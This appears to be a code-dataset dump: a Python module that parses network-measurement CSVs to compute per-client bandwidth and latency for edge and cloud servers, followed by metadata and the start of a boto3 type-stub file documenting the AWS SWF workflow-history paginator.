ret[clientIP] = []
totalbytes[clientIP] = byte
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
previoustimestamp_micros = currenttimestamp_micros
logger.debug(str(len(ret)) + " clients in ret")
print ("read kn" + str(linecount) + " from " + inputfile + "(including headers)")
return ret, totalbytes
def readbandwidthvalues_self_perclient(config_parser, section, inputfile, server, conntype, logger):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "self" in inputfile
#ret = {}
ret = OrderedDict()
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type" + str(conntype))
sys.exit(0)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
#columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,
# Mode,Type,ID,Timestamp,Bytes
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[3] == "ClientPort"
assert row[4] == "ServerIP"
assert row[5] == "ServerPort"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
measuredbytes = row[13]
keyword = row[6]
clientIP = row[2]
clientPort = row[3]
serverIP = row[4]
ServerPort = row[5]
currentTestID = ""
try:
assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except Exception as e:
print (conntype)
print (inputfile)
print (row[2] [:len(client_subnetaddr)] + "!=" + client_subnetaddr)
linecount += 1
continue
linecount += 1
if (server == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(server == "cloud" and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
if clientIP not in ret.keys():
print ("first " + str(clientIP))
ret[clientIP] = []
bandwidthkbps = float(row[13])
bandwidthMbps = bandwidthkbps / 1000
#print (bandwidthMbps)
#print (row)
ret[clientIP].append(bandwidthMbps)
#else:
# print("discarded" + str(row))
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_self_timeplot(config_parser, section, inputfile, segment, conntype, logger):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "self" in inputfile
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=conntype,
logger=logger)
evaluate_fragmentquality=config_parser.getboolean(section, "evaluate_fragmentquality")
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(conntype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
logger.debug("evaluate_fragmentquality = " + str(evaluate_fragmentquality))
ret = OrderedDict()
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line 0 contains the query
#line #1 contains its arguments
if linecount == 0 or linecount == 1:
linecount += 1
continue
#line #2 contains the name of each column
# ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
# ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[3] == "ClientPort"
assert row[4] == "ServerIP"
except Exception as e:
logger.critical("unknown columns: " + str(row))
logger.critical("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
try:
measuredbytes = row[13]
timestamp_micros = row[12]
keyword = row[6]
clientIP = row[2]
clientPort = row[3]
serverIP = row[4]
assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except:
print (row)
print (inputfile)
logger.critical("conntype: " + str(conntype))
logger.critical("inputfile" + str(inputfile))
logger.critical(str(clientIP[:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
logger.critical("Exit")
sys.exit(0)
linecount += 1
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if clientIP not in ret:
ret[clientIP] = []
bandwidthkbps = float(measuredbytes)
bandwidthMbps = bandwidthkbps / 1000
date = datetime.datetime.fromtimestamp(float(timestamp_micros) / 1000000.0)
if evaluate_fragmentquality:
ret[clientIP].append({"bandwidthMbps": bandwidthMbps, "clientPort": clientPort, "timestamp": date, "fragmentquality":row[14]})
else:
ret[clientIP].append({"bandwidthMbps": bandwidthMbps, "clientPort": clientPort, "timestamp": date})
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_mim_timeplot(config_parser, section, inputfile, segment, conntype, logger):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "mim" in inputfile
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=conntype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(conntype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
ret = OrderedDict()
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line 0 contains the query
#line #1 contains its arguments
if linecount == 0 or linecount == 1:
linecount += 1
continue
#line #2 contains the name of each column
# ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
# ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[3] == "ClientPort"
assert row[4] == "ServerIP"
except Exception as e:
logger.critical("unknown columns: " + str(row))
logger.critical("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
#measuredbytes = row[13]
timestamp_micros = row[12]
#keyword = row[6]
clientIP = row[2]
#clientPort = row[3]
serverIP = row[4]
try:
assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except:
logger.critical("conntype: " + str(conntype))
logger.critical("inputfile" + str(inputfile))
logger.critical(str(clientIP[:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
logger.critical("Exit")
sys.exit(0)
linecount += 1
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if clientIP not in ret:
ret[clientIP] = []
date = datetime.datetime.fromtimestamp(float(timestamp_micros) / 1000000.0)
ret[clientIP].append({"timestamp": date})
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_mim_timeplot_usingfixbuckets(config_parser, section, inputfile, segment, conntype,
logger, bucketsize_microsec):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "mim" in inputfile
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=conntype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(conntype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
print (segment)
print ("bucketsize_microsec " + str(bucketsize_microsec))
ret = OrderedDict()
lastclientIP = ""
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line 0 contains the query
#line #1 contains its arguments
if linecount == 0 or linecount == 1:
linecount += 1
continue
#line #2 contains the name of each column
# ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
# ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[3] == "ClientPort"
assert row[4] == "ServerIP"
except Exception as e:
logger.critical("unknown columns: " + str(row))
logger.critical("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
clientIP = row[2]
serverIP = row[4]
byte = float(row[13])
currenttimestamp_micros = float(row[12])
try:
assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except:
logger.critical("conntype: " + str(conntype))
logger.critical("inputfile" + str(inputfile))
logger.critical(str(clientIP[:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
logger.critical("Exit")
sys.exit(0)
linecount += 1
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if clientIP not in ret:
#new clientIP
ret[clientIP] = []
if len(ret) == 1:
#this is the first row containing results for the first target server
lastclientIP = clientIP
currentBytes = byte
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
else:
#switch to a new client with a different IP
#add the results of the previous client
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec/2)) / 1000000.0)
ret[lastclientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
lastclientIP = clientIP
currentByte = 0.0
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
continue
elif lastclientIP == clientIP:
if currenttimestamp_micros < bucket_endtime_microsec:
#packet received within the bucketsize_microsec interval
currentBytes += byte
else:
#packet received within the next bucketsize_microsec interval
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec/2)) / 1000000.0)
ret[clientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
currentBytes = byte
bucket_starttime_microsec = bucket_endtime_microsec
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
continue
else:
print("NON DOVREMMO MAI ARRIVARCI")
assert False
#add the last results
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec/2)) / 1000000.0)
ret[lastclientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readlatencyvalues_noisemim(config_parser, section, inputfile, connectiontype, segment, noise):
assert "SORTED_LEGACY" in inputfile
assert "mim" in inputfile
ret = []
client_subnetaddr = config_parser.get(section, "client_subnetaddr_" + connectiontype)
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_" + connectiontype)
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_" + connectiontype)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[13] == "latency"
assert row[6] == "Keyword"
assert row[4] == "ServerIP"
except:
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
try:
latency = float(row[13])
except:
print (inputfile)
for iii in range(0, len(row)):
print(str(iii) + ": " + str(row[iii]) )
sys.exit(0)
serverIP = row[4]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "remote" and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
#print str(latency/1000)
if latency != 0:
ret.append(latency/1000)
#print ret
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
| 42.501438 | 167 | 0.477838 | 5,877 | 73,910 | 5.893994 | 0.047984 | 0.022605 | 0.018188 | 0.026675 | 0.904443 | 0.892549 | 0.872802 | 0.859003 | 0.83559 | 0.81388 | 0 | 0.019963 | 0.425937 | 73,910 | 1,738 | 168 | 42.525892 | 0.796436 | 0.068232 | 0 | 0.904068 | 0 | 0 | 0.084273 | 0.024011 | 0 | 0 | 0 | 0 | 0.114352 | 1 | 0.011512 | false | 0 | 0.003837 | 0 | 0.026861 | 0.063699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
36b454309baf2a18d7fd4e5d1b0589a88c650cba | 259,309 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/swf/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/swf/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/swf/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Dict
from botocore.paginate import Paginator
class GetWorkflowExecutionHistory(Paginator):
def paginate(self, domain: str, execution: Dict, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.get_workflow_execution_history`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/GetWorkflowExecutionHistory>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
execution={
'workflowId': 'string',
'runId': 'string'
},
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'events': [
{
'eventTimestamp': datetime(2015, 1, 1),
'eventType': 'WorkflowExecutionStarted'|'WorkflowExecutionCancelRequested'|'WorkflowExecutionCompleted'|'CompleteWorkflowExecutionFailed'|'WorkflowExecutionFailed'|'FailWorkflowExecutionFailed'|'WorkflowExecutionTimedOut'|'WorkflowExecutionCanceled'|'CancelWorkflowExecutionFailed'|'WorkflowExecutionContinuedAsNew'|'ContinueAsNewWorkflowExecutionFailed'|'WorkflowExecutionTerminated'|'DecisionTaskScheduled'|'DecisionTaskStarted'|'DecisionTaskCompleted'|'DecisionTaskTimedOut'|'ActivityTaskScheduled'|'ScheduleActivityTaskFailed'|'ActivityTaskStarted'|'ActivityTaskCompleted'|'ActivityTaskFailed'|'ActivityTaskTimedOut'|'ActivityTaskCanceled'|'ActivityTaskCancelRequested'|'RequestCancelActivityTaskFailed'|'WorkflowExecutionSignaled'|'MarkerRecorded'|'RecordMarkerFailed'|'TimerStarted'|'StartTimerFailed'|'TimerFired'|'TimerCanceled'|'CancelTimerFailed'|'StartChildWorkflowExecutionInitiated'|'StartChildWorkflowExecutionFailed'|'ChildWorkflowExecutionStarted'|'ChildWorkflowExecutionCompleted'|'ChildWorkflowExecutionFailed'|'ChildWorkflowExecutionTimedOut'|'ChildWorkflowExecutionCanceled'|'ChildWorkflowExecutionTerminated'|'SignalExternalWorkflowExecutionInitiated'|'SignalExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionSignaled'|'RequestCancelExternalWorkflowExecutionInitiated'|'RequestCancelExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionCancelRequested'|'LambdaFunctionScheduled'|'LambdaFunctionStarted'|'LambdaFunctionCompleted'|'LambdaFunctionFailed'|'LambdaFunctionTimedOut'|'ScheduleLambdaFunctionFailed'|'StartLambdaFunctionFailed',
'eventId': 123,
'workflowExecutionStartedEventAttributes': {
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'tagList': [
'string',
],
'continuedExecutionRunId': 'string',
'parentWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'parentInitiatedEventId': 123,
'lambdaRole': 'string'
},
'workflowExecutionCompletedEventAttributes': {
'result': 'string',
'decisionTaskCompletedEventId': 123
},
'completeWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'failWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON'
},
'workflowExecutionCanceledEventAttributes': {
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'cancelWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionContinuedAsNewEventAttributes': {
'input': 'string',
'decisionTaskCompletedEventId': 123,
'newExecutionRunId': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'tagList': [
'string',
],
'workflowType': {
'name': 'string',
'version': 'string'
},
'lambdaRole': 'string'
},
'continueAsNewWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'WORKFLOW_TYPE_DEPRECATED'|'WORKFLOW_TYPE_DOES_NOT_EXIST'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'CONTINUE_AS_NEW_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTerminatedEventAttributes': {
'reason': 'string',
'details': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'cause': 'CHILD_POLICY_APPLIED'|'EVENT_LIMIT_EXCEEDED'|'OPERATOR_INITIATED'
},
'workflowExecutionCancelRequestedEventAttributes': {
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123,
'cause': 'CHILD_POLICY_APPLIED'
},
'decisionTaskScheduledEventAttributes': {
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'startToCloseTimeout': 'string'
},
'decisionTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'decisionTaskCompletedEventAttributes': {
'executionContext': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'decisionTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskScheduledEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'input': 'string',
'control': 'string',
'scheduleToStartTimeout': 'string',
'scheduleToCloseTimeout': 'string',
'startToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'heartbeatTimeout': 'string'
},
'activityTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'activityTaskCompletedEventAttributes': {
'result': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE'|'SCHEDULE_TO_START'|'SCHEDULE_TO_CLOSE'|'HEARTBEAT',
'scheduledEventId': 123,
'startedEventId': 123,
'details': 'string'
},
'activityTaskCanceledEventAttributes': {
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123,
'latestCancelRequestedEventId': 123
},
'activityTaskCancelRequestedEventAttributes': {
'decisionTaskCompletedEventId': 123,
'activityId': 'string'
},
'workflowExecutionSignaledEventAttributes': {
'signalName': 'string',
'input': 'string',
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123
},
'markerRecordedEventAttributes': {
'markerName': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'recordMarkerFailedEventAttributes': {
'markerName': 'string',
'cause': 'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'timerStartedEventAttributes': {
'timerId': 'string',
'control': 'string',
'startToFireTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'timerFiredEventAttributes': {
'timerId': 'string',
'startedEventId': 123
},
'timerCanceledEventAttributes': {
'timerId': 'string',
'startedEventId': 123,
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'control': 'string',
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskStartToCloseTimeout': 'string',
'tagList': [
'string',
],
'lambdaRole': 'string'
},
'childWorkflowExecutionStartedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123
},
'childWorkflowExecutionCompletedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'result': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionFailedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'reason': 'string',
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTimedOutEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'timeoutType': 'START_TO_CLOSE',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionCanceledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTerminatedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123,
'startedEventId': 123
},
'signalExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'signalName': 'string',
'input': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionSignaledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'signalExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'SIGNAL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionCancelRequestedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'requestCancelExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'requestCancelExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'REQUEST_CANCEL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'scheduleActivityTaskFailedEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'cause': 'ACTIVITY_TYPE_DEPRECATED'|'ACTIVITY_TYPE_DOES_NOT_EXIST'|'ACTIVITY_ID_ALREADY_IN_USE'|'OPEN_ACTIVITIES_LIMIT_EXCEEDED'|'ACTIVITY_CREATION_RATE_EXCEEDED'|'DEFAULT_SCHEDULE_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_SCHEDULE_TO_START_TIMEOUT_UNDEFINED'|'DEFAULT_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_HEARTBEAT_TIMEOUT_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'requestCancelActivityTaskFailedEventAttributes': {
'activityId': 'string',
'cause': 'ACTIVITY_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_ALREADY_IN_USE'|'OPEN_TIMERS_LIMIT_EXCEEDED'|'TIMER_CREATION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'cancelTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionFailedEventAttributes': {
'workflowType': {
'name': 'string',
'version': 'string'
},
'cause': 'WORKFLOW_TYPE_DOES_NOT_EXIST'|'WORKFLOW_TYPE_DEPRECATED'|'OPEN_CHILDREN_LIMIT_EXCEEDED'|'OPEN_WORKFLOWS_LIMIT_EXCEEDED'|'CHILD_CREATION_RATE_EXCEEDED'|'WORKFLOW_ALREADY_RUNNING'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'workflowId': 'string',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'lambdaFunctionScheduledEventAttributes': {
'id': 'string',
'name': 'string',
'control': 'string',
'input': 'string',
'startToCloseTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'lambdaFunctionStartedEventAttributes': {
'scheduledEventId': 123
},
'lambdaFunctionCompletedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'result': 'string'
},
'lambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'reason': 'string',
'details': 'string'
},
'lambdaFunctionTimedOutEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'timeoutType': 'START_TO_CLOSE'
},
'scheduleLambdaFunctionFailedEventAttributes': {
'id': 'string',
'name': 'string',
'cause': 'ID_ALREADY_IN_USE'|'OPEN_LAMBDA_FUNCTIONS_LIMIT_EXCEEDED'|'LAMBDA_FUNCTION_CREATION_RATE_EXCEEDED'|'LAMBDA_SERVICE_NOT_AVAILABLE_IN_REGION',
'decisionTaskCompletedEventId': 123
},
'startLambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'cause': 'ASSUME_ROLE_FAILED',
'message': 'string'
}
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Paginated representation of a workflow history for a workflow execution. This is the up to date, complete and authoritative record of the events related to all tasks and events in the life of the workflow execution.
- **events** *(list) --*
The list of history events.
- *(dict) --*
Event within a workflow execution. A history event can be one of these types:
* ``ActivityTaskCancelRequested`` – A ``RequestCancelActivityTask`` decision was received by the system.
* ``ActivityTaskCanceled`` – The activity task was successfully canceled.
* ``ActivityTaskCompleted`` – An activity worker successfully completed an activity task by calling RespondActivityTaskCompleted .
